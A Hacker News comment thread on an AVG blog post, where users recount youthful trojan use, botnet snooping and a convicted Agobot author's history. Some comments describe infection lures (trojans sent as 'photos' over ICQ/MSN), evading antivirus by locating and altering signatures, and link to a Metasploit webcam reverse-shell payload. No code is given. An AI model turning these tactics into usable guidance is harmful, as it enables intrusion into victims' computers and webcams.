
Have you ever chatted with a hacker within a virus? - jhchabran
http://blogs.avg.com/news-threats/chatted-hacker-virus/
======
waffle_ss
Well, back in my pre-teen script kiddie days of using BO2K/Netbus and early
Sub7 builds I was on the other side of the screen. Sub7 I recall distinctly
had all the listed features and a lot more - keylogging, chat client, webcam
viewing, screen capture, open/closing CD tray, etc. There was a GUI interface
that would let you select any of the above features that would create a
payload that could be injected into any .exe file. You could also provide an
ICQ account number that would get a message any time the client comes online,
with the relevant IP:port to connect to. These were in the days before anti-
virus or firewalls were prevalent, so it was pretty easy to trick people into
opening an infected .exe.

I think I ended up having around 80 people infected, so there was always
someone online. I never did anything malicious with it, just chatting and
opening/closing CD-ROM drives mostly (and juvenile things like sending my
friend's browser to bigboobs.com ... unfortunately his dad was standing behind
him at the time). I had dial-up so the webcam viewing wasn't feasible. If
someone was freaked out and wanted me to go away I could remotely destroy the
trojan. Come to think of it, most people were just curious about what was
going on and didn't seem to mind the chat very much (but obviously they
usually wanted me to remove it / delete it afterward). Then again, I infected
people by random selection on ICQ, so maybe they were just chatty people.

~~~
wahsd
Does anyone know if all webcams have the activity light hardwired in-line with
the webcam itself. I have always wondered if the light is a definitive
indicator whether the cam is on, or if the light can be deactivated. Sorry, I
guess this only applies to non-Mac, mostly Win, machines as something so
plebeian as an indicator light would never make it into a Mac.

~~~
kamkha
Nice try with the jab at Apple—MacBook Pros have a small green light to
indicate whether the camera is in use or not.

~~~
spec_laconic
Yeah, you can just take a quick pic using the camera; the light flashes for
barely a second and you won't notice. Metasploit has a stager for exactly this
purpose:
[http://www.metasploit.com/modules/payload/osx/x86/isight/rev...](http://www.metasploit.com/modules/payload/osx/x86/isight/reverse_tcp)

~~~
kaybe
There's always a bit of black cardboard and tape. Try to take a picture now.
:)

~~~
leke
Lol, I actually have a bit of duct tape over my eeePC web cam.

------
myared
Not the same, but similar story... 6-8 years ago, I chatted directly with the
person responsible for breaking into a web server on the server itself. It's a
strange feeling to ssh in and watch someone browsing through files. I did a
'echo "hello?" | wall', showed the guy how to answer me back, and we
eventually moved the conversation to IRC. I was using some website to convert
English to Portuguese.

Turns out it was a (young) teenager from Brazil. His compromise was that he
wouldn't touch our files or deface our websites so long as he could remain in
control of the server. I carelessly tried to kick him off, uninstall the
rootkit and restart the server only to find out that he could continue to use
the same exploit to get access. Then we just called our host and asked them to
take down the box. Lost a whole day to it, but I walked away understanding a
little bit more about motivation, and learned about an exploit that I hadn't
known about previously.

------
willvarfar
Steve Gibson (grc.com) famously used chatroom credentials in a trojan he
reverse-engineered to get in and chat with the bot maker.

And, infamously, got DDOSed for it.

Can't find the transcript now, which is a shame; I think he took it offline to
let the intertubes cool down.

~~~
stephenheron
<http://www.crime-research.org/library/grcdos.pdf> I think this is what you
are talking about, really interesting read if I remember correctly.

~~~
TazeTSchnitzel
>When those insecure and maliciously potent Windows XP machines are mated to
high-bandwidth Internet connections, we are going to experience an escalation
of Internet terrorism the likes of which has never been seen before.

He was right, too.

EDIT: That was an absolutely fascinating read. Thank you.

------
molmalo
Back in 2000, when I was in high school, I developed a trojan similar to
netbus and sub7, but just to use it in the school comp labs. The objective was
only to have fun. Telling my friends their login passwords, controling their
pcs, (screen streaming, key logging, file management, mouse and kb control,
some nice screen effects like making the screen move like ocean waves, launch
programs, it was fun, lol). There were like 200 machines connected. The
infection was simple (auto-installed in services/run) and later it was even
network-automated (when I got the admin pass). Then, I handed the commanding
program to some friends who used it a little bit too uch. We even had the net
admins credentials, so we started to get some extra benefits (like internet
outside the internet lab, etc). The admins realized what was happening, and
started to use Norton ghost in every pc, first once a week (before it was once
every 2 weeks), then, as the infections didnt stop and they started to get
very paranoid, they run Norton ghost every single day. It all ended when they
discovered a copy of the the source code I had given to a friend of mine. They
confronted him, but luckly he took the blame (as he later told me, it was very
dumb of him to have saved a copy in his own account. But he managed to
convince them that it was just a learning project that went little bit too
far. They reprimanded but nothing serious happened to him. So, he is still one
of my closest friends,=)

~~~
sharkweek
Most of the time those moments of getting caught turn into great opportunities
to get out of trouble by going white hat for them. I figure if they threatened
him with any real punishment, just offer some free security consulting.

~~~
erikb
In a perfect world that might happen. Sadly people are not happy, if you point
their mistakes at them and they can get very agressive against you, especially
when their job or their public reputation might be at stake. Add some age
difference of over 20 years and an IT education that started with punching
holes into cards and you are f __ __d. Then going to offer them your
assistence wouldn't be the smart thing to do, don't u think?

~~~
leke
It really would make great sense to create an 'report exploits' link on your
site/software so that people know they can freely contact you about this kind
of thing without repercussions. I actually got one about 2 days ago for a
forum I coded because of such a link I put there.

It might be interesting to even make a whole website dedicated to exploit
hunting and allow companies to register themselves.

------
raintrees
Back a bit (yes, I am dating myself here), I worked for a floppy disk
duplicating company that was hired by a certain software company to attempt to
duplicate the disks with built-in copy protection. The customer provided a
routine where they would have the end-users' disk controllers read a hidden
half sector at the end of a half-sized normal ninth sector, I think was the
gist of that particular scheme.

If I remember correctly, they had typed some example code in plain ascii, so
we obliged with the typical "help, I'm being held captive in a Chinese disk
duplication company." Which was almost true, as the owners of our company were
of Chinese decent. And in my defense, we did have a number of all-nighters
(with Pizza) when another software company would call us with a sudden "we've
changed the masters - erase and re-dupe whatever you have)." I was younger,
then...

Anyway, a few messages were passed back and forth this way, before we got back
to serious business and implemented the copy protection scheme. Not really a
virus, but still geeky fun.

Did you know that 8" floppy disks had excellent aerobatic qualities when flung
from the top of a building? The trick was holding them by the corner during
the wind-up...

------
dsrguru
Sorry for the tangent, but did the author really have to assert his or her
endorsement of Chinese nationalist politics and write "Taiwan, China" instead
of the neutral "Taiwan"? Taiwan is not currently controlled by the PRC,
regardless of whether or not one believes it "should" be. Taiwan's acting
government, the ROC, believes it shouldn't be, and China's government, the
PRC, believes it should be. Most Taiwanese people seem to agree with the ROC,
but I've met some who identify as Chinese and would be fine being governed by
the PRC. To refer to a disputed land as objectively part of a specific
country, one that doesn't even currently govern it no less, really bothers me.

~~~
jackalope
Fellow web developers, I can tell you from experience that you must edit this
list before deploying it in an application:

[http://www.iso.org/iso/country_codes/iso_3166_code_lists/cou...](http://www.iso.org/iso/country_codes/iso_3166_code_lists/country_names_and_code_elements.htm)

My understanding is that we have the UN to thank:

[http://www.iso.org/iso/country_codes/background_on_iso_3166/...](http://www.iso.org/iso/country_codes/background_on_iso_3166/iso_3166_and_the_un.htm)

~~~
mkl
Is it just Taiwan, or are there other countries in similar situations?

~~~
freehunter
The ISO list shows Occupied Palestine in its preferred UN nomenclature,
PALESTINIAN TERRITORY, OCCUPIED. This is a politically controversial area as
well. How you should choose to identify the area depends in part on to which
region you're targeting your site/app.

------
tshadwell
Recently a friend of mine sent me a piece of obfuscated JS that was in a
phishing page that was being posted around his large gaming related website.
Threw the JS into closure compiler with advanced optimisations and pretty
print and out comes relatively unobfuscated code- it cleared up the series of
horrible regexes anyway. The code injected a Java applet that downloaded a
botnet virus. Decompiling the Java applet revealed the steamid of the guy
orchestrating this. Added him on steam and had a great conversation in which
he accidentally indirectly admitted the botnet was under his control. A fun
use of a Sunday. The evidence was never sent to anyone, thinking nothing would
come of it.

~~~
mikeevans
Any idea why would he put his Steam ID in the applet?

~~~
tshadwell
It was on a website for trading items on steam. Perhaps he wanted to force
them to trade items, then sell the items on for real life money.

------
emehrkay
To answer the title: yes.

It was my freshman year of college and my first introduction to broadband in
1998. I discovered irc via mIrc and somehow somebody put something on my
computer where they could control the mouse/keyboard.

I watched the guy move the cursor around for a while then begin to type to
him. He was cool, and told me how to prevent it from happening again.

~~~
splatzone
How did he do it?

~~~
emehrkay
I have no idea. I wish I did though

------
EricR23
When I was a teenager I found it fun to intentionally infect myself with
malware and try to study it. I know realize this wasn't the most responsible
thing to do, as I wasn't in a sandboxed environment, but it was a great
learning experience and taught me a _lot_ about networking and security.

One of the biggest malwares I ever managed to infect myself with was a bot,
which caused my computer to become a zombie on a ~10K botnet. I spent hours
running a packet sniffer and seeing how the client interacted with the IRC
network it called home to. Upon connecting to the privately run IRC network,
the bot would authenticate with a user and pass. I assume it created one upon
connecting the first time to the network. My best guess as to why this is is
so that the bot master could track the total number of zombies and compare it
to how many were actively connected to the botnet. Kind of a cleaver way to
get metrics, now that I think about it.

When I temporarily stopped the bot from connecting to IRC, I decided it might
be fun to login as the bot and join the channel I saw it connecting to. Upon
joining the channel, I saw thousands of other users on the channel. I spent a
couple of days sitting there, masquerading myself as a bot, and watching the
botmaster interact with the bots. The botmaster would issue commands that I
can't really recall anymore, but I do remember seeing a lot of commands that I
assumed told the bots to download extra malware from a remote host. I remember
seeing URLs for zip and exe files.

Eventually I got a little bored of this, so I decided to message the
botmaster. It was easy to spot him; out of the three ops on the channel, he
was the only full op. I tried a "hello" and waited. And waited. And then I was
k-lined from the IRC network.

The next day when I logged onto my computer, I found my Internet connectivity
was being overwhelmed with bogus TCP requests. I had pissed off the botmaster
by snooping, and now I was getting DDoS'd. I imagine he/she commandeered a
small number of the bots to do this. It wouldn't take many... I imagine back
then, given my bandwidth, 10-15 would have done it.

Fun times. I remember posting about my botnet adventures to Security Focus way
back when. Some people got really interested and followed my posts, while
other professionals asked me to stop because I wasn't running a sandbox.

IMO, those were different times. I'm not sure I'd recommend something like
this these days. After hearing about certain botnets being tied to various
mafias and gangs around the world (which is probably more common than you
think. See [http://www.ibtimes.co.uk/articles/321149/20120329/mafia-
cont...](http://www.ibtimes.co.uk/articles/321149/20120329/mafia-controlling-
cybercrime-botnets.htm)), I'm not sure I'd really want to risk interfering
with their activities.

~~~
niekmaas
Perhaps a rather naive questions, but: were the username and pw transfered in
plaintext?

~~~
sirclueless
Think of the username and password as a tracking cookie, more than actual
authentication.

------
baby
Reminds me of those good times when we discovered Trojan me and my friends. We
kept infecting people, until they found out about it and started doing it as
well. It became a war between us. Almost everyone got infected in our class.

I remember the pranks we used to pull, like printing "Help me I'm trapped
inside the printer!", changing the wallpaper for a porn one, typing messages
instead of the person on MSN.

Once we infected some random guy we didn't know, and popped up a black chat
screen (like the one in matrix) and before we could write "Hi Neo" the guy was
already writing to us "hey what's up?". The guy was so stupid he chatted with
us like it was a normal thing.

Then we all grew up and we fell a bit bad for finding stuff we shouldn't have
found, so we stopped.

------
thechut
"I am sorry but AVG blogs are currently undergoing essential maintenance.

Normal service will be resumed shortly, in the meantime go to AVG.com for more
information about AVG products or go to our Facebook page to join our thriving
online community.

We apologise for any disruption this may have caused."

~~~
fuzzix
[http://webcache.googleusercontent.com/search?q=cache:blogs.a...](http://webcache.googleusercontent.com/search?q=cache:blogs.avg.com/news-
threats/chatted-hacker-virus/)

No screen shots or links in this, obviously.

------
alanbyrne
Is it just me or do the "features" of this trojan resemble a late 90's Netbus

------
saintfiends
Back in the days I used to do this. I would stay up better part of the night
adding random people to MSN or ICQ and sending the Trojan saying it was my
picture. So before sending it I would describe myself as someone they'd want
to see, to drive up their curiosity, basically I'll be what they'd want me to
be. This was very successful. I never maintained a big list of zombied boxes,
I'd infect remove on a per night basis depending on how bored I was.

I also saw the progression of hiding IP's in MSN connections. At first they
would make a direct connection, later they only made a direct connection while
transferring files bigger than a certain size. They completely removed it
after some point, don't remember very well.

After I got to know more about networking how things are connected, I realized
that my ISP allowed to initiate NULL sessions to other customers. I remember
how excited I was to find this. I would place the RATs everywhere with curious
names in hopes for them to click or just test exploits on them.

Another interesting thing I found was I was able to invite anyone, even random
emails (Hotmail) while having a group chat. I had so much fun doing that back
then.

After infection it was basically just chatting, messing with the LED's, CD-
ROM's.. people were more interested in finding out how I did it and just chat
rather than being mad. I remember one time when I did this to a friend he got
scared and ripped of the cable breaking the wall socket.

It was really easy to evade anti-virus programs at the time. I usually just
split the file into half, run the scanner on it, split again until I narrowed
down to the signature and would just change a value or two.

It was interesting to see how many times people change the text before hitting
send while chatting. Obviously I was too naive to know and respect privacy
back then.

------
jes5199
Yeah, when I was at boarding school (high school), we had a LAN in the dorms
full of everybody's shiny new Windows 95 desktops. So everybody just had SMB
shares, and nobody was careful about what they clicked on. I put a trojan exe
with the icon made to look like a text file in mine. Someone clicked on it,
and then I popped up a dialog box that said "Hello! You've got a trojan. Open
notepad and let's talk about it" and he typed into notepad and I watched with
the keyboard sniffer and answered back by injecting keypresses. (I couldn't
see video of the screen - I think I could take screenshots, though) I learned
a lot about networking that year.

------
tmh88j
A long time ago (windows 98 I believe) my screen went blank and green text
appeared saying "Hello, how are you?" I was about 12 at the time so I had no
idea what was going on. I don't recall my response, but I remember the
"person" on the other side saying "You left a back door open. Would you like
me to close it?" I restarted my computer and I still have no idea what it was.

Was this a virus, a hacker, something else? I completely forgot about it until
this thread.

~~~
TazeTSchnitzel
Probably a worm.

------
huepfburg
I am the creator of the PTN FUN TROJAN from 2003. I was just starting to learn
coding and created this simple server/client program using visual basic and
numerous code VB snippets I found online. I was able to open/close CD trays,
turn off monitors, disable CRTL+ALT+DEL, send screenshots, hide the mouse
pointer and other stuff. I created an autostart CD with the title "CS MAPS"
and handed it around on private LANs infecting all my friends computers. I had
quite a few computers depending on my mercy. On one occasion, one of my
friends realized, he wasn't in full control of his computer. He opened notepad
and tried to communicate with me, the hacker, by typing messages. I could read
his messages from the screenshots and found it pretty hilarious at that time.
I responded by turning his screen up-side-down.

------
orangethirty
Reminds me of all the fun I had playing with malware on my own computer during
the mid-to-late 90's. Being quite ignorant about the whole thing allowed me to
look and find things that would not be considered safe. Hacker websites (like
the old cult of the dead cow folks), exploits, etc. I remember downloading the
LOIC and wondering what the hell it was.

Of course, I wanted to be a "hacker". You know, make ATM's spit out cash so my
brother could buy a more powerful engine for his mustang. That kind of thing.
Never really meant or even did harm, because my limited knowledge back then
kept me out of trouble.

I did however get to do something very important while looking for people to
"hack" (not really) on ICQ. I met my wife. Wonderful things happen by
serendipity.

------
ubernostrum
How about recommending movies to the person who hacked your Netflix account?

[http://www.reddit.com/r/AskReddit/comments/v0z53/for_the_pas...](http://www.reddit.com/r/AskReddit/comments/v0z53/for_the_past_two_years_i_have_been_sharing_my/)

------
mathewsimonton
When I was about 11 or 12 years old, I was chatting with a friend on AOL
Instant Messenger and suddenly was forced into a black screen with green text
where I communicated briefly to someone who was forcing this new chat session
onto me. The crack scared the absolute crap out of me. It ended once I told
the person that I was irritated and that I was going to contact the police (I
didn't and I doubt there was anything that really could have been done). Once
the fear subsided I became more interested in how this person did what they
did. It's one of those weird technology-related moments that sticks out in my
mind to this day more than 10 years later.

------
dak1
Just as a side note, the post was made in Taiwan's D3 forum, but from the use
of simplified Chinese, it seems the hacker was from China.

------
ago
I am a convicted malware coder (Agobot/Gaobot/Phatbot/etc...) and it all
started because of a chat I had with a botmaster.

Back then I needed a key for Warcraft III, which just came out, so I tried
some keygen I found on the net, without any antivirus. When the keygen did not
work I knew something was wrong, so I checked for suspicious network traffic
and saw some IRC connection, quickly found the process responsible for causing
the traffic and fired up a disassembler. After UPX unpacking I had the
assembler code to the program and was able to determine the IRC server, the
bot password (they didn't use password hashes or hostmasks back then) and I
got a command reference for the specific bot (SDBOT). I joined the channel
disguised as one of the bots, logged in and sent the remove command. This
kills the botnet. The bot herder was pissed, but I started talking to him and
I got interested in malware to get CD keys, which I couldn't afford at the
time.

I started modifying SDBOT for my usage, writing scanners and fixing bugs in
the IRC connection code. After I while I felt limited by the codebase and
started my own called Agobot. Agobot quickly grew into one of the most capable
trojans at the time, with thousands of variants. I also quickly got a team of
at peak ~15 people together who helped with testing and coding. Coding was
mostly done by me and at most 3 other coders. We were having really cool
stuff, like wormride which was a tool to make other malware/worms spread
Agobot instead of itself. It also contained an exploit that I wrote for the
LSASS hole that Sasser used only a few days after the advisory. My LSASS
exploit did not crash the target, which let it spread a few days without being
noticed. ISC noticed it after a while and raised the threat level to orange.

There was also a variant of the bot that used the waste network to communicate
and the gnutella network to find themselves. It made the DHS shit their pants
and release an advisory :)

First I hosted the bots on public IRC, but after being detected very quickly I
got to talk with some IRC opers that offered me a private server to run the
botnet in exchange for usage rights. These were powerful servers, holding
around 50k bots at peak. Basically this all got busted by the FBI, which
caused the Foonet/CIT shutdown. For more infos, check these URLs:

<http://www.theregister.co.uk/2004/08/27/ddos_mafia_busted/>

<http://regmedia.co.uk/2008/10/03/03116720232.pdf>

<http://www.securityfocus.com/news/9411>

<http://newssocket.com/foonet/>

[http://www.techimo.com/forum/imo-community/100728-your-
isp-n...](http://www.techimo.com/forum/imo-community/100728-your-isp-next-
one.html)

Anyway, they caught me because I accidentally let a bot start a short scan
from the linux host where we hosted the SVN repository and IRC. The company
running the datacenter detected the scan and decided to investigate the server
(illegaly) and found all the stuff (I didn't even think about encrypting all
that). I got 2 years probation for this as well as hacking Valve Software.

Hers some more info:

<http://en.wikipedia.org/wiki/Agobot>

<http://www.honeynet.org/node/55>

<http://www.infectionvectors.com/vectors/kitchensink.htm>

[http://web.archive.org/web/20070423182932/http://www.lurhq.c...](http://web.archive.org/web/20070423182932/http://www.lurhq.com/phatbot.html)

------
strictfp
Alternative title: Amateur virus analyst does not take necessary precautions,
gets pwned by virus author.

~~~
kehrlann
Not all of us are professional virus analysts. No need to mock him, his post
is worth reading for mere amateurs like myself.

~~~
strictfp
True. Just find it odd that this gets posted on the official blog. Interesting
indeed, but a bit careless.

------
Feoh
This article REALLY makes me wish I could turn on my Mac laptops built in
camera and microphone.

~~~
science_robot
You can't? Here's a MacRuby script that can take a photo with your webcam:
<https://github.com/pioz/snappy>.

~~~
sukuriant
Now, given the content of the article a moment ago, the question becomes:
"Should I trust science_robot? Or is this a trojan?"

~~~
erikb
Well, just learn ruby and read the source code of snappy, then write your own
camera activation code -> no problem. If you don't trust your link, go to the
well known github website and search for the project yourself.

"With growing wish for self responsibility comes growing need for power."

